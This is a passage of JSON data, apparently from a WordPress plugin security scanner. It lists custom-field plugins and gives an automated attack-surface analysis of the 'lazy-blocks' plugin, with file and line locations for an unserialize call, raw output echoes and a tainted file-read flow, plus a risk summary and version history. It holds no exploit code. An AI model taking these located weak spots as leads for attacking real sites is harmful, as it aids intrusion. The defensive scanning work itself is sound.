🙂\u003C\u002Fp>\n","Restores the Custom Field meta box for the Gutenberg Block Editor.",1000,57269,17,"2026-03-26T22:07:00.000Z","7.0","4.7","5.6.20",[20,119,23,120],"custom-fields","meta-box","https:\u002F\u002Fperishablepress.com\u002Fcustom-fields-gutenberg\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-fields-gutenberg.2.4.5.zip",100,{"slug":125,"name":126,"version":127,"author":128,"author_profile":129,"description":130,"short_description":131,"active_installs":132,"downloaded":133,"rating":29,"num_ratings":29,"last_updated":134,"tested_up_to":135,"requires_at_least":136,"requires_php":137,"tags":138,"homepage":137,"download_link":142,"security_score":123,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"it-listings","IT Listings","1.5.1","indithemes","https:\u002F\u002Fprofiles.wordpress.org\u002Findithemes\u002F","\u003Cp>IT Residence is a companion plugin that offers extended functionalities to the IT Residence WordPress Theme including blocks and custom post types.\u003C\u002Fp>\n","Custom Post Types and additional Functionality for IT Residence WordPress Theme",300,9371,"2026-01-11T02:44:00.000Z","6.4.8","6.0","",[20,139,23,140,141],"custom-post-types","it-residence","metabox","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fit-listings.1.5.2.zip",{"slug":144,"name":145,"version":146,"author":147,"author_profile":148,"description":149,"short_description":150,"active_installs":151,"downloaded":152,"rating":29,"num_ratings":29,"last_updated":153,"tested_up_to":154,"requires_at_least":136,"requires_php":155,"tags":156,"homepage":159,"download_link":160,"security_score":123,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"stepfox-looks","Stepfox Looks","1.0.0","StepFox Themes","https:\u002F\u002Fprofiles.wordpress.org\u002Fstephog\u002F","\u003Cp>Stepfox Looks is a powerful companion plugin that extends the WordPress block editor with advanced functionality and responsive controls. This plugin is designed to work seamlessly with Stepfox themes, providing professional-grade customization options.\u003C\u002Fp>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Metafield Block\u003C\u002Fstrong>: Display custom fields and metadata with advanced rendering options\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Load More Block\u003C\u002Fstrong>: AJAX-powered pagination for query blocks\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Responsive Extensions\u003C\u002Fstrong>: Comprehensive responsive controls for all blocks\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Social Share Extensions\u003C\u002Fstrong>: Enhanced social sharing functionality\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cover Block Extensions\u003C\u002Fstrong>: Advanced cover block customization\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Post Template Fallback\u003C\u002Fstrong>: Intelligent fallback system for post templates\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Custom Blocks\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Metafield Block\u003C\u002Fstrong>: Render custom fields with multiple display options (text, image, link, button)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Load More Block\u003C\u002Fstrong>: Add AJAX load more functionality to query blocks\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Block Extensions\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Responsive Controls\u003C\u002Fstrong>: Add responsive settings to all blocks\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Social Share\u003C\u002Fstrong>: Enhanced social link blocks with sharing functionality\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cover Block\u003C\u002Fstrong>: Extended cover block options\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Post Template Fallback\u003C\u002Fstrong>: Prevents template breaking when switching post types\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Requirements\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>WordPress 6.0 or higher\u003C\u002Fli>\n\u003Cli>PHP 7.4 or higher\u003C\u002Fli>\n\u003Cli>Stepfox theme (recommended for optimal compatibility)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For support, please use the WordPress.org support forum on the plugin page. Documentation and additional resources are available at https:\u002F\u002Fstepfoxthemes.com\u002Fsupport\u002F\u003C\u002Fp>\n\u003Ch3>Privacy Policy\u003C\u002Fh3>\n\u003Cp>This plugin does not collect or store any personal data.\u003C\u002Fp>\n","Enhances the block editor with responsive controls, custom blocks, and extensions for modern magazine and news sites.",30,255,"2025-09-13T12:34:00.000Z","6.7.5","7.4",[20,119,23,157,158],"load-more","responsive","https:\u002F\u002Fstepfoxthemes.com\u002Fplugins\u002Fstepfox-looks","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fstepfox-looks.1.0.0.zip",{"slug":162,"name":163,"version":164,"author":165,"author_profile":166,"description":167,"short_description":168,"active_installs":169,"downloaded":170,"rating":123,"num_ratings":48,"last_updated":171,"tested_up_to":16,"requires_at_least":136,"requires_php":155,"tags":172,"homepage":137,"download_link":176,"security_score":123,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"voxycure-framework","Voxycure Framework","1.0.9","Voxycure Infotech","https:\u002F\u002Fprofiles.wordpress.org\u002Fvoxycureinfotech\u002F","\u003Cp>\u003Cstrong>Voxycure Framework\u003C\u002Fstrong> is a modern and developer-friendly plugin that empowers you to structure WordPress content your way — entirely for free.\u003C\u002Fp>\n\u003Cp>It allows you to:\u003Cbr \u002F>\n– Add custom fields to any post type, including WooCommerce products\u003Cbr \u002F>\n– Create custom Gutenberg blocks using PHP templates\u003Cbr \u002F>\n– Manage custom post types and taxonomies\u003Cbr \u002F>\n– Group fields as Document Settings or Blocks\u003Cbr \u002F>\n– Use built-in import\u002Fexport tools for deployment\u003C\u002Fp>\n\u003Cp>With no pro version or locked features, Voxycure is a complete framework ideal for developers and agencies who want full control over data and layout.\u003C\u002Fp>\n\u003Cp>📘 \u003Ca href=\"https:\u002F\u002Fvoxycure.com\u002Fresources\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Full Documentation\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Unlimited custom fields: text, image, repeater, etc.\u003C\u002Fli>\n\u003Cli>Attach fields to post types (including WooCommerce) or use in custom blocks\u003C\u002Fli>\n\u003Cli>Create and manage post types and taxonomies\u003C\u002Fli>\n\u003Cli>Register PHP-based block templates\u003C\u002Fli>\n\u003Cli>JSON export\u002Fimport for reuse and migration\u003C\u002Fli>\n\u003Cli>Developer hooks and filters for customization\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later.\u003C\u002Fp>\n","Create custom fields, blocks, and post types with no limitations. A flexible, free solution for building with custom data in WordPress.",10,823,"2025-12-04T09:21:00.000Z",[173,119,139,174,175],"block-editor","field-builder","gutenberg-blocks","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvoxycure-framework.1.0.9.zip",{"slug":178,"name":179,"version":180,"author":181,"author_profile":182,"description":183,"short_description":184,"active_installs":29,"downloaded":185,"rating":29,"num_ratings":29,"last_updated":186,"tested_up_to":16,"requires_at_least":136,"requires_php":155,"tags":187,"homepage":189,"download_link":190,"security_score":123,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"native-custom-fields","Native Custom Fields – Custom Content Types and Meta Fields","1.0.2","Kadim Gültekin","https:\u002F\u002Fprofiles.wordpress.org\u002Farkenon\u002F","\u003Cp>Native Custom Fields is a modern WordPress plugin for creating custom content types, meta fields, and options pages using WordPress’ own native component system.\u003C\u002Fp>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FM_HO8bI1eZA?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Cp>Instead of shipping a proprietary UI framework or custom database structure, Native Custom Fields leverages WordPress core technologies such as:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>@wordpress\u002Fscripts\u003C\u002Fli>\n\u003Cli>@wordpress\u002Fcomponents\u003C\u002Fli>\n\u003Cli>@wordpress\u002Felements\u003C\u002Fli>\n\u003Cli>@wordpress\u002Ficons\u003C\u002Fli>\n\u003Cli>@wordpress\u002Fdata\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>This ensures a seamless, future-proof experience that evolves together with WordPress core.\u003C\u002Fp>\n\u003Ch4>Why Native Custom Fields?\u003C\u002Fh4>\n\u003Cp>Most custom field plugins introduce their own UI systems, internal data storage layers, or hidden configuration post types.\u003C\u002Fp>\n\u003Cp>Native Custom Fields follows a different philosophy:\u003C\u002Fp>\n\u003Cp>• Uses WordPress native UI components\u003Cbr \u002F>\n• Stores configuration in wp_options\u003Cbr \u002F>\n• Stores data in postmeta, termmeta, and usermeta\u003Cbr \u002F>\n• Does not create unnecessary database tables\u003Cbr \u002F>\n• Does not register hidden configuration post types\u003Cbr \u002F>\n• Follows WordPress coding standards\u003C\u002Fp>\n\u003Cp>The result is a clean, lightweight, and maintainable solution.\u003C\u002Fp>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Ch4>Content Types\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Register Custom Post Types\u003C\u002Fli>\n\u003Cli>Register Custom Taxonomies\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Meta Fields\u003C\u002Fh4>\n\u003Cp>Create field groups and attach them to:\u003Cbr \u002F>\n* Post Types\u003Cbr \u002F>\n* Taxonomies\u003Cbr \u002F>\n* User Profiles\u003Cbr \u002F>\n* Options Pages (Pro)\u003C\u002Fp>\n\u003Ch4>Supported Components\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Input Control\u003C\u002Fli>\n\u003Cli>Text Control\u003C\u002Fli>\n\u003Cli>Number Control\u003C\u002Fli>\n\u003Cli>Select Control\u003C\u002Fli>\n\u003Cli>Checkbox Control\u003C\u002Fli>\n\u003Cli>Radio Control\u003C\u002Fli>\n\u003Cli>Textarea Control\u003C\u002Fli>\n\u003Cli>Range Control\u003C\u002Fli>\n\u003Cli>Toggle Control\u003C\u002Fli>\n\u003Cli>Color Picker\u003C\u002Fli>\n\u003Cli>Color Palette\u003C\u002Fli>\n\u003Cli>Date Picker\u003C\u002Fli>\n\u003Cli>DateTime Picker\u003C\u002Fli>\n\u003Cli>Time Picker\u003C\u002Fli>\n\u003Cli>Unit Control\u003C\u002Fli>\n\u003Cli>Angle Picker Control\u003C\u002Fli>\n\u003Cli>Alignment Matrix Control\u003C\u002Fli>\n\u003Cli>Border Box Control\u003C\u002Fli>\n\u003Cli>Border Control\u003C\u002Fli>\n\u003Cli>Box Control\u003C\u002Fli>\n\u003Cli>Toggle Group Control\u003C\u002Fli>\n\u003Cli>Combobox Field\u003C\u002Fli>\n\u003Cli>Font Size Picker\u003C\u002Fli>\n\u003Cli>File Upload\u003C\u002Fli>\n\u003Cli>Media Library\u003C\u002Fli>\n\u003Cli>Form Token\u003C\u002Fli>\n\u003Cli>ExternalLink\u003C\u002Fli>\n\u003Cli>Heading\u003C\u002Fli>\n\u003Cli>Notice\u003C\u002Fli>\n\u003Cli>Text Highlight\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Custom Components:\u003Cbr \u002F>\n* Repeater\u003Cbr \u002F>\n* Group\u003C\u002Fp>\n\u003Ch4>Developer-Friendly\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Built with PSR-4 autoloading\u003C\u002Fli>\n\u003Cli>Strict Types compatible\u003C\u002Fli>\n\u003Cli>Modern React-based admin UI\u003C\u002Fli>\n\u003Cli>Clean and extendable architecture\u003C\u002Fli>\n\u003Cli>Import \u002F Export via JSON or PHP (Pro)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Performance-Focused\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Minimum admin UI bloat\u003C\u002Fli>\n\u003Cli>Native WordPress components\u003C\u002Fli>\n\u003Cli>No redundant database tables\u003C\u002Fli>\n\u003Cli>Optimized for long-term maintainability\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Credits\u003C\u002Fh3>\n\u003Cp>Built using official WordPress packages:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>@wordpress\u002Fscripts\u003C\u002Fli>\n\u003Cli>@wordpress\u002Fcomponents\u003C\u002Fli>\n\u003Cli>@wordpress\u002Felements\u003C\u002Fli>\n\u003Cli>@wordpress\u002Ficons\u003C\u002Fli>\n\u003Cli>@wordpress\u002Fdata\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Assets:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>All images located in the Admin\u002Fassets\u002Fimages folder are self created and are licensed under CC0 1.0 Universal (CC0 1.0) Public Domain Dedication.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Composer Packages:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>PHP DI – Copyright (c) Matthieu Napoli\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Source Code\u003C\u002Fh3>\n\u003Cp>It is available on GitHub:\u003Cbr \u002F>\n* GitHub: https:\u002F\u002Fgithub.com\u002FArkenon\u002Fnative-custom-fields\u003C\u002Fp>\n\u003Ch3>Developers\u003C\u002Fh3>\n\u003Cp>If you want to contribute to the plugin:\u003Cbr \u002F>\n1) Download the source code and run \u003Ccode>npm install\u003C\u002Fcode> to install the development dependencies.\u003Cbr \u002F>\n2) To install composer dependencies, run \u003Ccode>composer install\u003C\u002Fcode>.\u003Cbr \u002F>\n3) Run \u003Ccode>npm start\u003C\u002Fcode> to start the development server.\u003Cbr \u002F>\n4) To build the plugin, run \u003Ccode>npm run build\u003C\u002Fcode>.\u003C\u002Fp>\n","Custom Content Types and Meta Fields built with WordPress native components. Modern, clean, and performance-focused.",233,"2026-03-18T12:25:00.000Z",[173,119,188,23,120],"custom-post-type","https:\u002F\u002Fnativecustomfields.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnative-custom-fields.1.0.2.zip",{"attackSurface":192,"codeSignals":459,"taintFlows":490,"riskAssessment":518,"analyzedAt":526},{"hooks":193,"ajaxHandlers":455,"restRoutes":456,"shortcodes":457,"cronEvents":458,"entryPointCount":29,"unprotectedCount":29},[194,200,204,208,211,213,216,219,221,224,228,231,236,240,242,246,249,252,255,258,261,265,268,271,274,278,282,286,290,293,296,299,302,305,309,312,315,318,321,324,326,330,334,337,340,344,348,352,355,358,362,366,370,373,376,378,380,385,387,389,391,392,393,395,397,399,401,403,406,409,411,414,419,423,426,428,430,435,438,441,443,445,449,452],{"type":195,"name":196,"callback":197,"file":198,"line":199},"action","enqueue_block_editor_assets","block_builder_enqueue_scripts","classes\\3rd\\class-astra.php",20,{"type":195,"name":201,"callback":201,"priority":202,"file":203,"line":199},"admin_menu",11,"classes\\class-admin.php",{"type":195,"name":201,"callback":205,"priority":206,"file":203,"line":207},"maybe_hide_menu_item",12,21,{"type":195,"name":209,"callback":209,"file":203,"line":210},"admin_enqueue_scripts",26,{"type":195,"name":196,"callback":197,"file":203,"line":212},27,{"type":195,"name":196,"callback":214,"priority":91,"file":203,"line":215},"enqueue_script_translations",28,{"type":195,"name":196,"callback":217,"file":203,"line":218},"block_builder_enqueue_styles",29,{"type":195,"name":220,"callback":217,"file":203,"line":151},"enqueue_block_assets",{"type":195,"name":222,"callback":222,"file":203,"line":223},"in_admin_header",32,{"type":225,"name":226,"callback":226,"file":203,"line":227},"filter","admin_footer_text",33,{"type":195,"name":196,"callback":229,"file":230,"line":199},"LazyBlocks_Assets::enqueue_runtime","classes\\class-assets.php",{"type":195,"name":232,"callback":233,"file":234,"line":235},"init","register_post_type","classes\\class-blocks.php",74,{"type":195,"name":232,"callback":237,"priority":238,"file":234,"line":239},"remove_custom_fields_support",150,76,{"type":225,"name":241,"callback":241,"priority":123,"file":234,"line":14},"allowed_block_types_all",{"type":195,"name":243,"callback":244,"file":234,"line":245},"admin_init","add_role_caps",83,{"type":225,"name":247,"callback":247,"priority":169,"file":234,"line":248},"display_post_states",86,{"type":225,"name":250,"callback":250,"priority":169,"file":234,"line":251},"disable_months_dropdown",87,{"type":225,"name":253,"callback":253,"priority":169,"file":234,"line":254},"post_class",88,{"type":225,"name":256,"callback":256,"priority":169,"file":234,"line":257},"post_row_actions",89,{"type":225,"name":259,"callback":260,"file":234,"line":98},"manage_lazyblocks_posts_columns","manage_posts_columns",{"type":225,"name":262,"callback":263,"priority":169,"file":234,"line":264},"manage_lazyblocks_posts_custom_column","manage_posts_custom_column",91,{"type":225,"name":266,"callback":267,"file":234,"line":96},"bulk_actions-edit-lazyblocks","bulk_actions_edit",{"type":225,"name":269,"callback":270,"priority":169,"file":234,"line":27},"handle_bulk_actions-edit-lazyblocks","handle_bulk_actions_edit",{"type":225,"name":272,"callback":273,"priority":123,"file":234,"line":13},"lzb\u002Fget_blocks","sanitize_block_configs",{"type":195,"name":275,"callback":276,"priority":199,"file":234,"line":277},"save_post","normalize_lazyblocks_post_status",101,{"type":225,"name":279,"callback":280,"file":234,"line":281},"views_edit-lazyblocks","change_activation_views_labels",104,{"type":195,"name":283,"callback":284,"file":234,"line":285},"save_post_lazyblocks","clear_blocks_cache",107,{"type":195,"name":287,"callback":288,"file":234,"line":289},"delete_post","maybe_clear_blocks_cache_on_delete",108,{"type":195,"name":291,"callback":288,"file":234,"line":292},"wp_trash_post",109,{"type":195,"name":294,"callback":288,"file":234,"line":295},"untrash_post",110,{"type":195,"name":297,"callback":284,"file":234,"line":298},"activated_plugin",113,{"type":195,"name":300,"callback":284,"file":234,"line":301},"deactivated_plugin",114,{"type":195,"name":303,"callback":284,"file":234,"line":304},"switch_theme",115,{"type":195,"name":306,"callback":307,"priority":169,"file":234,"line":308},"upgrader_process_complete","maybe_clear_blocks_cache_on_upgrade",116,{"type":195,"name":243,"callback":310,"file":234,"line":311},"handle_manual_cache_clear",119,{"type":225,"name":279,"callback":313,"file":234,"line":314},"add_clear_cache_link",122,{"type":225,"name":316,"callback":316,"priority":123,"file":234,"line":317},"block_categories_all",127,{"type":195,"name":232,"callback":319,"priority":199,"file":234,"line":320},"register_block",131,{"type":195,"name":232,"callback":322,"priority":199,"file":234,"line":323},"register_block_render",132,{"type":195,"name":275,"callback":276,"priority":199,"file":234,"line":325},214,{"type":195,"name":327,"callback":328,"file":234,"line":329},"admin_notices","cache_cleared_notice",1356,{"type":195,"name":331,"callback":332,"priority":75,"file":333,"line":199},"lzb\u002Finit","include_controls","classes\\class-controls.php",{"type":195,"name":297,"callback":335,"file":336,"line":199},"deactivate_other_instances","classes\\class-deactivate-duplicate-plugin.php",{"type":195,"name":338,"callback":339,"file":336,"line":207},"pre_current_active_plugins","plugin_deactivated_notice",{"type":225,"name":341,"callback":342,"file":343,"line":207},"lzb\u002Fadd_user_template","v2_5_0_convert_user_template","classes\\class-deprecated.php",{"type":225,"name":345,"callback":346,"file":343,"line":347},"lzb\u002Fimport_json","v2_5_0_convert_import_json_template",22,{"type":225,"name":349,"callback":350,"file":343,"line":351},"lzb\u002Fadd_user_block","v2_1_0_convert_user_block",25,{"type":195,"name":353,"callback":354,"file":343,"line":215},"lzb\u002Fhandlebars\u002Fobject","v2_0_0_deprecated_lzb_handlebars_object_action",{"type":195,"name":232,"callback":356,"file":343,"line":357},"deprecated_actions_usage_warning",31,{"type":195,"name":359,"callback":360,"priority":238,"file":361,"line":347},"classic_editor_enabled_editors_for_post_type","classic_plugin_force_gutenberg","classes\\class-force-gutenberg.php",{"type":195,"name":363,"callback":364,"priority":238,"file":361,"line":365},"use_block_editor_for_post_type","classic_plugin_force_gutenberg_2",23,{"type":195,"name":367,"callback":368,"priority":238,"file":361,"line":369},"use_block_editor_for_post","classic_plugin_force_gutenberg_3",24,{"type":225,"name":371,"callback":372,"file":361,"line":212},"user_can_richedit","user_can_richedit_force",{"type":195,"name":232,"callback":374,"file":375,"line":212},"prepare","classes\\class-handlebars.php",{"type":195,"name":243,"callback":232,"priority":28,"file":377,"line":215},"classes\\class-migration.php",{"type":195,"name":379,"callback":232,"priority":28,"file":377,"line":151},"wp",{"type":195,"name":381,"callback":382,"file":383,"line":384},"rest_api_init","register_routes","classes\\class-rest.php",34,{"type":195,"name":232,"callback":233,"file":386,"line":199},"classes\\class-templates.php",{"type":225,"name":388,"callback":388,"priority":199,"file":386,"line":365},"register_post_type_args",{"type":195,"name":196,"callback":390,"file":386,"line":210},"templates_editor_enqueue_scripts",{"type":225,"name":250,"callback":250,"priority":169,"file":386,"line":218},{"type":225,"name":256,"callback":256,"priority":169,"file":386,"line":151},{"type":225,"name":394,"callback":260,"file":386,"line":357},"manage_lazyblocks_templates_posts_columns",{"type":225,"name":396,"callback":263,"priority":169,"file":386,"line":223},"manage_lazyblocks_templates_posts_custom_column",{"type":195,"name":201,"callback":201,"file":398,"line":212},"classes\\class-tools.php",{"type":195,"name":243,"callback":400,"file":398,"line":151},"maybe_activate_block",{"type":195,"name":243,"callback":402,"file":398,"line":227},"maybe_export_json",{"type":195,"name":243,"callback":404,"file":398,"line":405},"maybe_duplicate_block",36,{"type":195,"name":407,"callback":209,"file":398,"line":408},"admin_footer",39,{"type":195,"name":327,"callback":327,"file":398,"line":410},42,{"type":225,"name":412,"callback":412,"file":413,"line":199},"wpml_config_array","classes\\class-wpml.php",{"type":225,"name":415,"callback":416,"priority":169,"file":417,"line":418},"lzb\u002Fprepare_block_attribute","filter_lzb_prepare_block_attribute","controls\\checkbox\\index.php",37,{"type":225,"name":420,"callback":421,"priority":169,"file":422,"line":405},"lzb\u002Fblock_render\u002Fattributes","filter_lzb_block_render_attributes","controls\\inner_blocks\\index.php",{"type":225,"name":415,"callback":416,"priority":169,"file":424,"line":425},"controls\\repeater\\index.php",40,{"type":225,"name":415,"callback":416,"priority":169,"file":427,"line":227},"controls\\select\\index.php",{"type":225,"name":415,"callback":416,"priority":169,"file":429,"line":384},"controls\\toggle\\index.php",{"type":225,"name":431,"callback":432,"file":433,"line":434},"lzb\u002Fcontrols\u002Fall","get_control_data","controls\\_base\\index.php",130,{"type":225,"name":436,"callback":437,"priority":75,"file":433,"line":320},"lzb\u002Fcontrol_value","closure",{"type":195,"name":196,"callback":439,"file":433,"line":440},"register_assets",145,{"type":195,"name":196,"callback":437,"priority":202,"file":433,"line":442},146,{"type":195,"name":220,"callback":437,"priority":202,"file":433,"line":444},163,{"type":195,"name":232,"callback":446,"priority":75,"file":447,"line":448},"init_hook","lazy-blocks.php",147,{"type":225,"name":450,"callback":437,"file":447,"line":451},"lzb\u002Fplugin_url",335,{"type":225,"name":453,"callback":437,"file":447,"line":454},"lzb_pro\u002Fplugin_url",342,[],[],[],[],{"dangerousFunctions":460,"sqlUsage":466,"outputEscaping":469,"fileOperations":206,"externalRequests":29,"nonceChecks":75,"capabilityChecks":488,"bundledLibraries":489},[461],{"fn":462,"file":463,"line":464,"context":465},"unserialize","vendors\\Handlebars\\Cache\\Disk.php",106,"$output = unserialize($serialized_data);",{"prepared":467,"raw":29,"locations":468},2,[],{"escaped":470,"rawEcho":471,"locations":472},49,7,[473,476,478,480,482,484,486],{"file":203,"line":474,"context":475},251,"raw output",{"file":203,"line":477,"context":475},252,{"file":234,"line":479,"context":475},524,{"file":386,"line":481,"context":475},343,{"file":386,"line":483,"context":475},345,{"file":398,"line":485,"context":475},67,{"file":398,"line":487,"context":475},565,14,[],[491,510],{"entryPoint":492,"graph":493,"unsanitizedCount":29,"severity":509},"import_json (classes\\class-tools.php:362)",{"nodes":494,"edges":506},[495,500],{"id":496,"type":497,"label":498,"file":398,"line":499},"n0","source","$_FILES",379,{"id":501,"type":502,"label":503,"file":398,"line":504,"wp_function":505},"n1","sink","file_get_contents() [SSRF\u002FLFI]",395,"file_get_contents",[507],{"from":496,"to":501,"sanitized":508},true,"low",{"entryPoint":511,"graph":512,"unsanitizedCount":29,"severity":509},"\u003Cclass-tools> (classes\\class-tools.php:0)",{"nodes":513,"edges":516},[514,515],{"id":496,"type":497,"label":498,"file":398,"line":499},{"id":501,"type":502,"label":503,"file":398,"line":504,"wp_function":505},[517],{"from":496,"to":501,"sanitized":508},{"summary":519,"deductions":520},"The plugin \"lazy-blocks\" v4.2.1 exhibits a generally good security posture with a low attack surface and a strong adherence to secure coding practices such as prepared statements for SQL queries and a high percentage of properly escaped output. The absence of any known unpatched vulnerabilities, despite a history of three CVEs, is a positive indicator of prompt security patching by the developers. However, the presence of the `unserialize` function is a notable concern. While not directly flagged by the taint analysis as a vulnerability in this specific version, the function is inherently risky if not used with extremely careful input sanitization, as it can lead to object injection vulnerabilities. The historical vulnerability types, including Code Injection and Cross-site Scripting, suggest that user-supplied data has been a vector for past issues, reinforcing the caution needed around functions like `unserialize`.",[521,523],{"reason":522,"points":169},"Presence of dangerous function: unserialize",{"reason":524,"points":525},"Past vulnerabilities indicate historical input sanitization issues",15,"2026-03-16T17:29:09.530Z",{"wat":528,"direct":543},{"assetPaths":529,"generatorPatterns":535,"scriptPaths":536,"versionParams":537},[530,531,532,533,534],"\u002Fwp-content\u002Fplugins\u002Flazy-blocks\u002Fassets\u002Fcss\u002Flazy-blocks-editor.css","\u002Fwp-content\u002Fplugins\u002Flazy-blocks\u002Fassets\u002Fcss\u002Flazy-blocks.css","\u002Fwp-content\u002Fplugins\u002Flazy-blocks\u002Fassets\u002Fjs\u002Flazy-blocks-editor.js","\u002Fwp-content\u002Fplugins\u002Flazy-blocks\u002Fassets\u002Fjs\u002Flazy-blocks.js","\u002Fwp-content\u002Fplugins\u002Flazy-blocks\u002Fassets\u002Fjs\u002Ffrontend.js",[],[532,533,534],[538,539,540,541,542],"lazy-blocks\u002Fassets\u002Fcss\u002Flazy-blocks-editor.css?ver=","lazy-blocks\u002Fassets\u002Fcss\u002Flazy-blocks.css?ver=","lazy-blocks\u002Fassets\u002Fjs\u002Flazy-blocks-editor.js?ver=","lazy-blocks\u002Fassets\u002Fjs\u002Flazy-blocks.js?ver=","lazy-blocks\u002Fassets\u002Fjs\u002Ffrontend.js?ver=",{"cssClasses":544,"htmlComments":550,"htmlAttributes":551,"restEndpoints":555,"jsGlobals":558,"shortcodeOutput":588},[545,546,547,548,549],"lazy-blocks-editor","lazy-blocks-frontend","lzb-block","lzb-frontend-wrapper","lzb-frontend-block",[],[552,553,554],"data-lazy-block","data-lazy-block-id","data-lazy-block-name",[556,557],"\u002Fwp-json\u002Flazy-blocks\u002Fv1\u002Fblocks","\u002Fwp-json\u002Flazy-blocks\u002Fv1\u002Ftemplate",[559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587],"LazyBlocks","lazyBlocks","wp.blocks.registerBlockType","wp.element.createElement","wp.editor.registerBlockType","wp.i18n.__","wp.blocks.getBlockType","wp.blocks.unregisterBlockType","wp.data.select","wp.data.dispatch","wp.element.Component","wp.components.PanelBody","wp.components.TextControl","wp.components.TextareaControl","wp.components.SelectControl","wp.components.ToggleControl","wp.components.ToolbarGroup","wp.components.ToolbarButton","wp.components.Popover","wp.components.IconButton","wp.components.Modal","wp.editor.InspectorControls","wp.editor.RichText","wp.editor.BlockControls","wp.blockEditor.useBlockProps","wp.blockEditor.InnerBlocks","wp.blockEditor.BlockList","wp.blockEditor.BlockEdit","wp.blockEditor.BlockPreview",[589,590],"[lazy-blocks]","[lazy-blocks id=",{"error":508,"url":592,"statusCode":593,"statusMessage":594,"message":594},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Flazy-blocks\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":202,"versions":596},[597,602,610,617,626,635,644,653,662,670,680],{"version":6,"download_url":26,"svn_tag_url":598,"released_at":39,"has_diff":51,"diff_files_changed":599,"diff_lines":39,"trac_diff_url":600,"vulnerabilities":601,"is_current":508},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.2.0&new_path=%2Flazy-blocks%2Ftags%2F4.2.1",[],{"version":603,"download_url":604,"svn_tag_url":605,"released_at":39,"has_diff":51,"diff_files_changed":606,"diff_lines":39,"trac_diff_url":607,"vulnerabilities":608,"is_current":51},"4.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flazy-blocks%2Ftags%2F4.1.1&new_path=%2Flazy-blocks%2Ftags%2F4.2.0",[609],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":66,"download_url":611,"svn_tag_url":612,"released_at":39,"has_diff":51,"diff_files_changed":613,"diff_lines":39,"trac_diff_url":614,"vulnerabilities":615,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flazy-blocks\u002Ftags\u002F4.